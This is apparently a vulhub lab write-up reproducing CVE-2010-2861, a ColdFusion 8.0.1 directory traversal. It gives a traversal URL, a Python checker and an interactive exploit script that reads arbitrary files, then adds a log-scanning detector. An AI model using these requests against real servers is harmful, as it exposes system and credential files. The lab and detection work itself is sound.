Environment setup:
Using vulhub, enter the corresponding directory and start the Adobe ColdFusion 8.0.1 server:
[root@localhost ~]# cd /home/vulhub-master/coldfusion/CVE-2010-2861/
[root@localhost CVE-2010-2861]# docker-compose up -d
Check the exposed port:
[root@localhost ~]# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
781868f36616 vulhub/coldfusion:8.0.1 "bash -c '/opt/coldf…" 24 hours ago Up 24 hours 0.0.0.0:8500->8500/tcp, :::8500->8500/tcp cve-2010-2861_coldfusion_1
The environment may take 1 to 5 minutes to start. Once it is up, visit http://your-ip:8500/CFIDE/administrator/enter.cfm to see the initialization page; enter the password admin to initialize the whole environment.
Vulnerability reproduction:
Directly visit http://your-ip:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en and inspect the response in Burp Suite; the file /etc/passwd is read back in the page:
PoC:
import requests

url = "http://192.168.33.170:8500/"  # base URL of the target
poc = "CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en"  # read /etc/passwd
res = requests.get(url + poc)  # send the request
if "/bin/bash" in res.text and res.status_code == 200:  # judge by the "/bin/bash" marker and a 200 response
    print("CVE-2010-2861 exists")
PyCharm output:
EXP:
import re
import requests

url = "http://192.168.33.170:8500/"  # base URL of the target
poc = "CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en"  # read /etc/passwd
res = requests.get(url + poc)  # send the request
if "/bin/bash" in res.text and res.status_code == 200:  # judge by the "/bin/bash" marker and a 200 response
    print("CVE-2010-2861 exists")
    while 1:  # EXP loop
        target_file = input("Enter the file you want to read: ")
        # replace /etc/passwd in the working request with the file path entered
        exp_res = requests.get(res.url.replace("/etc/passwd", target_file))
        # the file content is returned inside <title>; print the regex match
        print(re.findall(r"<title>([\s\S]*?)</title>", exp_res.text))
PyCharm output:
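On the defensive side, the request pattern from the reproduction above (a traversal sequence and a null byte in the locale parameter) is easy to pick out of web-server access logs. The following is an added example, not code from the original post; the log lines are constructed, and scoping the check to paths under /CFIDE/administrator/ is an assumption.

```python
import re
from typing import List, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /CFIDE/administrator/enter.cfm HTTP/1.1" 200 5120
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en HTTP/1.1" 200 2231
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /CFIDE/administrator/enter.cfm?locale=..%2F..%2Fetc%2Fpasswd%2500en HTTP/1.1" 200 2231
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /CFIDE/administrator/enter.cfm?locale=en HTTP/1.1" 200 5120
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# ".." as a whole path segment, with either slash style.
TRAVERSAL_RE = re.compile(r'(?:^|[\\/])\.\.(?:[\\/]|$)')


def is_cve_2010_2861_probe(request_target: str) -> bool:
    """True if the request hits the CFIDE administrator pages (assumed scope)
    with a locale value containing traversal or a null byte after decoding."""
    parts = urlsplit(request_target)
    if not parts.path.lower().startswith("/cfide/administrator/"):
        return False
    for value in parse_qs(parts.query, keep_blank_values=True).get("locale", []):
        decoded = unquote(value)  # parse_qs decoded once; this also catches %25 double-encoding
        if "\x00" in decoded or TRAVERSAL_RE.search(decoded):
            return True
    return False


def scan_log(log_text: str) -> List[Tuple[str, str]]:
    """Return (client_ip, request_target) for every line that looks like a probe."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if match and is_cve_2010_2861_probe(match.group(1)):
            hits.append((line.split(" ", 1)[0], match.group(1)))
    return hits


if __name__ == "__main__":
    for ip, target in scan_log(SAMPLE_LOG):
        print(f"possible CVE-2010-2861 probe from {ip}: {target}")
```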